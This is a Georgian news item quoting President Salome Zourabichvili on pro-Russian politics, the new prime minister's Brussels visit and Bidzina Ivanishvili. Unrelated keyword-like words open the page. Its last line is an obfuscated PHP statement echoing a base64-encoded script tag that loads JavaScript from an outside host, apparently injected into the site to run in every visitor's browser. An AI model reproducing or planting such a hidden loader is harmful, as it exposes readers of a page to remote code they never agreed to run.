celsiusi
ავერსი შნაიდერი

 რეალურად ყველა გრძნობს, მით უმეტეს არჩევნების პერიოდში, რომ ამ ქვეყანაში პრორუსულობას არავინ გაპატიებს, - ამის შესახებ საქართველოს პრეზიდენტმა, სალომე ზურაბიშვილმა განაცხადა.

პრეზიდენტის თქმით, პრემიერ-მინისტრი ირაკლი კობახიძე დასავლეთის წარმომადგენლების კრიტიკით გამოირჩეოდა, თუმცა პრემიერ-მინისტრად არჩევის შემდეგ მისი პირველი ვიზიტი ბრიუსელში შედგა.

„საქართველოს მოქალაქეები და საზოგადოება არ დაუშვებს პრორუსულ მთავრობას - მმართველ პარტიას, თუ ის იქნება გამოკვეთილად პრორუსული. ამიტომ ვერ ბედავს ვერავინ. თუ შეამჩნიეთ, ჩვენი ახალი პრემიერი, რომელიც გამორჩეული იყო იმით, რომ არ ტოვებდა დასავლეთის წარმომადგენლებს, ისეთი სიტყვებით ამკობდა, ჩავიდა სად? - ბრიუსელში. ვის იღებს პირველ რიგში? - ევროკავშირის ელჩებს. დაავიწყდა, რომ პეკინში იყო მისი ბოლო მოგზაურობა, როგორც პარტიის თავმჯდომარის. ეს არის ის ნიშნები, რომელიც საინტერესოა“, - განაცხადა სალომე ზურაბიშვილმა.

კითხვაზე, ხედავს თუ არა „ქართული ოცნების“ საპატიო თავმჯდომარის, ბიძინა ივანიშვილისა და რუსეთის ინტერესების თანხვედრას, სალომე ზურაბიშვილი აცხადებს, რომ „არ ვიცი“, თუმცა "არის რაღაც ნიშნები".

„ვხედავ, რომ არის რაღაც ნიშნები, რომელიც შეიძლება იყოს სიფრთხილე, შეიძლება იყოს პირადი მენტალობის თანხვედრა, შეიძლება ბევრი რამ იყოს, მაგრამ ეს ჩემი საკითხი არაა“, - დასძინა მან.

208
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");